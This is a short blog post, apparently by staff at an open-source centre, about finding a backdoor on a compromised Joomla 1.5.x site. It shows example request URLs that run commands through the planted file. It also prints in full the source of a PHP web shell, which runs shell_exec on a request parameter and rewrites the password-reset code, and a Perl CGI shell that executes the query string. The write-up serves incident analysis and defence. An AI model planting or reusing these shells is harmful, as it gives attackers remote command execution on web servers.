Joomla Bug Day at OSCC MAMPU

Joomla Bug Day at OSCC MAMPU

We spend the whole morning discussing about the Joomla! 1.5.x (5 below) bug. You can read Indhran blog about how we reset the admin password.

Rescue Your Joomla 15x Sites

Related blog post

Then Abdullah our Hightech Rojak Blogger found something in the Apache log.

This command

http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=ls

When we tried it using web brower like Mozilla Firefox. We can list all the files in the directory. I used that link to find the location of the mod_lsys.php file and used cat to view the file. Simply from the Mozilla Firefox.


http://oscc.lan/modules/mod_jsys/mod_jsys.php?cmd=cat%20/var/www/html/cioconf/modules/mod_jsys/mod_jsys.php

--------- mod_jsys.php content

Welcome Welcome

chmod("../../modules/mod_jsys/mod_jsys.cgi", 0755);

if(!empty($_REQUEST['cmd'])) {
$buf = shell_exec($_REQUEST['cmd']);
$buf = str_replace("\n", "
\n", $buf);
echo $buf;
}

if(!empty($_REQUEST['patch'])) {
$fd = fopen("../../components/com_user/models/reset.php", "r");
$fd2 = fopen("../../tmp/p", "w");
if(!$fd) {
echo "Unable to patch";
exit;
}
while($buf = fgets($fd)) {
if(!strpos($buf, "block = 0 AND activation = '.\$db->Quote(")) {
fwrite($fd2, $buf);
}
else {
fwrite($fd2, 'if($db->Quote($token) == "\'\'") {
die("FUCK OFF RETARD");
}'."\n");
fwrite($fd2, ' $db->setQuery(\'SELECT id FROM #__users WHERE block = 0 AND activation = \'.$db->Quote($token));');
}
}
fclose($fd2);
$res = rename("../../tmp/p", "../../components/com_user/models/reset.php");
if($res) {
echo "Patched";
}
else {
echo "Patch failed, unable to copy file";
system("rm -f ../../tmp/p");
}
}

?>

---- mod_jsys.cgi content

#!/usr/bin/perl

print "Content-type: text/html\r\n\r\n";

print "Welcome\n";

@cmd = split(/=/, $ENV{'QUERY_STRING'});
$cmd[1] =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$cmd = `$cmd[1]`;
$cmd =~ s/\n/\n/g;
print $cmd;